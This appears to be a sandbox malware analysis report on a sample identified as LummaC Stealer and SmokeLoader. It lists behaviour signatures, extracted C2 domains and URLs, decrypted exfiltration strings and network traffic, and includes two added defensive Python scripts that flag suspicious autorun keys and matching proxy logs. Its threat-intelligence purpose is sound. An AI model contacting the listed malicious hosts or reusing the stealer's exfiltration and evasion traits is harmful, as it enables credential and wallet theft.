Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483386
MD5: 94267a284d656590e74246749da7f91c
SHA1: bccb3bd1483e50641862412e152dc5c7b590f4e8
SHA256: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd
Tags: exe

Detection

LummaC, Go Injector, LummaC Stealer, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SIDT)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match
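Added example, not code from the sandbox report or from either malware family: a host-side check for the persistence behaviour the signatures above flag (an autostart Run key pointing at a user-writable folder, the payload dropped without an extension, as with C:\Users\user\AppData\Roaming\sashibt). It runs over Sysmon-style registry-set event records so it works offline. The event records are constructed; the Run value name "sashibt" is an assumption reused from the dropped file name (the report does not give the value name), and the list of user-writable folders is the analyst's choice.

```python
"""Added triage check for suspicious autorun (Run / RunOnce) registry writes.
Works over Sysmon-style Event ID 13 records; no live registry access."""
import re
from pathlib import PureWindowsPath

# Autorun locations the check cares about (the report's Sigma hits name CurrentVersion\Run).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\[^\\]+$", re.IGNORECASE)
# User-writable folders a legitimate autorun rarely points at (analyst-chosen, an assumption).
SUSPICIOUS_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\",
                   "\\users\\public\\", "\\programdata\\")
EXEC_EXTS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk"}


def extract_path(details):
    """Program path from an autorun value: "C:\\x y\\a.exe" /arg or C:\\a.exe /arg."""
    details = details.strip()
    if details.startswith('"'):
        end = details.find('"', 1)
        return details[1:end] if end > 0 else details[1:]
    return details.split(" ", 1)[0]


def check_registry_event(ev):
    """Hit reasons for one Sysmon-style registry event (dict); [] when not interesting."""
    if ev.get("EventID") != 13 or not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return []
    path = extract_path(ev.get("Details", ""))
    reasons = ["autorun-key-set"]
    if any(d in path.lower() for d in SUSPICIOUS_DIRS):
        reasons.append("points-to-user-writable-folder")
    if PureWindowsPath(path).suffix.lower() not in EXEC_EXTS:
        # The report's dropped payload "sashibt" has no extension at all.
        reasons.append("target-lacks-executable-extension")
    return reasons


def triage(events):
    """(Run value name, reasons) for every event that produces at least one reason."""
    hits = []
    for ev in events:
        reasons = check_registry_event(ev)
        if reasons:
            hits.append((ev["TargetObject"].rsplit("\\", 1)[-1], reasons))
    return hits


# Constructed Sysmon Event ID 13 records (not taken from the report). The value name
# "sashibt" is an assumption based on the dropped file name.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sashibt",
     "Details": "C:\\Users\\user\\AppData\\Roaming\\sashibt"},
    {"EventID": 13, "Image": "C:\\Program Files\\Vendor\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent",
     "Details": "\"C:\\Program Files\\Vendor\\agent.exe\" /background"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\App\\DisplayName",
     "Details": "App"},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS):
        print(name, reasons)
```

A plain "autorun-key-set" on its own is normal installer behaviour (the second record); the combination with a user-writable folder and a target that has no executable extension is what separates the first record and matches the report's Sigma and "suspicious names" hits.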

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: file.exe Avira: detected
Source: https://callosallsaospz.shop/api Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apicnmamaa Avira URL Cloud: Label: malware
Source: lariatedzugspd.shop Avira URL Cloud: Label: malware
Source: callosallsaospz.shop Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/bO Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/e Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/b Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apioro Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/m Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/h Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/i Avira URL Cloud: Label: malware
Source: https://funrecipebooks.com/setups.exe Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/o Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/D Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiQbd Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apisF Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiem Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/// Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiyy Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/0 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\sashibt Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 7C81.exe.5268.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}
Source: liernessfornicsa.shop Virustotal: Detection: 19%
Source: mussangroup.com Virustotal: Detection: 13%
Source: callosallsaospz.shop Virustotal: Detection: 19%
Source: https://callosallsaospz.shop/api Virustotal: Detection: 22%
Source: lariatedzugspd.shop Virustotal: Detection: 19%
Source: https://callosallsaospz.shop/i Virustotal: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\3530.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7C81.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\sashibt ReversingLabs: Detection: 50%
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\3530.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sashibt Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: indexterityszcoxp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lariatedzugspd.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: outpointsozp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: liernessfornicsa.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: upknittsoappz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: shepherdlyopzc.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: unseaffarignsk.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: bOKHNM--
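Added example, not code from the sandbox report or from either malware family: a small Python triage script that takes the two configurations printed by the Malware Configuration Extractor above, de-duplicates the LummaC C2 list (the extractor repeats the same eight domains), and runs the resulting indicators together with the decrypted user agent "TeslaBrowser/5.5" and POST body layout "lid=%s&j=%s&ver=4.0" over a few constructed proxy-log records. It also applies the SmokeLoader trait from the Classification section (real downloads answer HTTP 404 with a non-empty body) but only to the configured C2 URLs, so the cover requests to microsoft.com and similar sites are deliberately not flagged. The log format, the values in the constructed records and the lid/j field contents are the example's assumptions.

```python
"""Added triage helper: IOCs from the extracted configs, applied to HTTP proxy records.
Not code from the report or from either malware family."""
import json
import re
from urllib.parse import urlsplit

# Configs as printed by the report's Malware Configuration Extractor. The LummaC
# extractor repeats the same eight domains; two copies are kept to show de-duplication.
LUMMAC_CONFIG = json.loads("""{"C2 url": [
  "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop",
  "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop",
  "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop",
  "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"],
  "Build id": "bOKHNM--"}""")
SMOKELOADER_CONFIG = json.loads("""{"Version": 2022, "C2 list": [
  "http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php",
  "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}""")

# Decrypted strings listed in the report: exfil user agent and POST body layout
# (lid=%s&j=%s&ver=4.0). The regex matches the layout only; field meanings are not known.
LUMMAC_UA = "TeslaBrowser/5.5"
LUMMAC_BODY_RE = re.compile(r"^lid=[^&]+&j=[^&]*&ver=4\.0$")


def iocs_from_configs(lumma_cfg, smoke_cfg):
    """De-duplicated network IOCs from the two extracted configs."""
    return {
        "lumma_domains": sorted({d.lower() for d in lumma_cfg["C2 url"]}),
        "smoke_urls": sorted(set(smoke_cfg["C2 list"])),
        "smoke_hosts": sorted({urlsplit(u).hostname for u in smoke_cfg["C2 list"]}),
    }


def parse_record(line):
    """Parse one constructed, pipe-delimited proxy record:
    timestamp|method|url|status|response_bytes|user_agent|request_body"""
    ts, method, url, status, resp_bytes, ua, body = line.rstrip("\n").split("|", 6)
    return {"ts": ts, "method": method, "url": url,
            "host": (urlsplit(url).hostname or "").lower(),
            "status": int(status), "resp_bytes": int(resp_bytes), "ua": ua, "body": body}


def classify(rec, iocs):
    """Reasons this request looks like LummaC or SmokeLoader C2 traffic ([] = no hit)."""
    reasons = []
    if rec["host"] in iocs["lumma_domains"]:
        reasons.append("lummac-c2-domain")
    if rec["ua"] == LUMMAC_UA:
        reasons.append("lummac-user-agent")
    if rec["method"] == "POST" and LUMMAC_BODY_RE.match(rec["body"]):
        reasons.append("lummac-post-body")
    if rec["url"] in iocs["smoke_urls"] or rec["host"] in iocs["smoke_hosts"]:
        reasons.append("smokeloader-c2-url")
        # SmokeLoader's real download answers 404 yet still carries data in the body.
        if rec["status"] == 404 and rec["resp_bytes"] > 0:
            reasons.append("smokeloader-404-with-body")
    return reasons


def scan(lines, iocs):
    """List of hit-reason lists, one per input record."""
    return [classify(parse_record(line), iocs) for line in lines]


# Constructed sample records (values invented for the example; the POST target and
# user agent follow the report, the lid/j values do not come from it).
SAMPLE_LOG = [
    "2024-07-15T10:01:02Z|POST|https://callosallsaospz.shop/api|200|512|TeslaBrowser/5.5|lid=AAAA&j=BBBB&ver=4.0",
    "2024-07-15T10:01:05Z|POST|http://mzxn.ru/tmp/index.php|404|2048|Mozilla/5.0 (Windows NT 10.0; Win64; x64)|",
    "2024-07-15T10:01:06Z|GET|https://www.microsoft.com/|200|90000|Mozilla/5.0 (Windows NT 10.0; Win64; x64)|",
    "2024-07-15T10:01:09Z|GET|https://example.com/index.html|200|1200|Mozilla/5.0 (Windows NT 10.0; Win64; x64)|",
]

if __name__ == "__main__":
    iocs = iocs_from_configs(LUMMAC_CONFIG, SMOKELOADER_CONFIG)
    print("LummaC domains:", ", ".join(iocs["lumma_domains"]))
    for line, reasons in zip(SAMPLE_LOG, scan(SAMPLE_LOG, iocs)):
        print("HIT " if reasons else "    ", line.split("|")[2], reasons)
```

Run the file directly to print the hit list; in use, replace SAMPLE_LOG with records from the proxy. The user-agent and body-layout checks matter because the HTTPS connections listed further down hide the path and body from a network sensor: only a TLS-intercepting proxy or host-side HTTP logging sees them, while the domain match works on DNS and SNI alone.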
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D7A10 CryptUnprotectData, 14_2_004D7A10
Source: 3530.exe, 00000008.00000003.2795754457.000001B962AE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_f5cb06df-e
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:51812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.5:51821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.5:51837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.5:51842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51886 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51896 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2
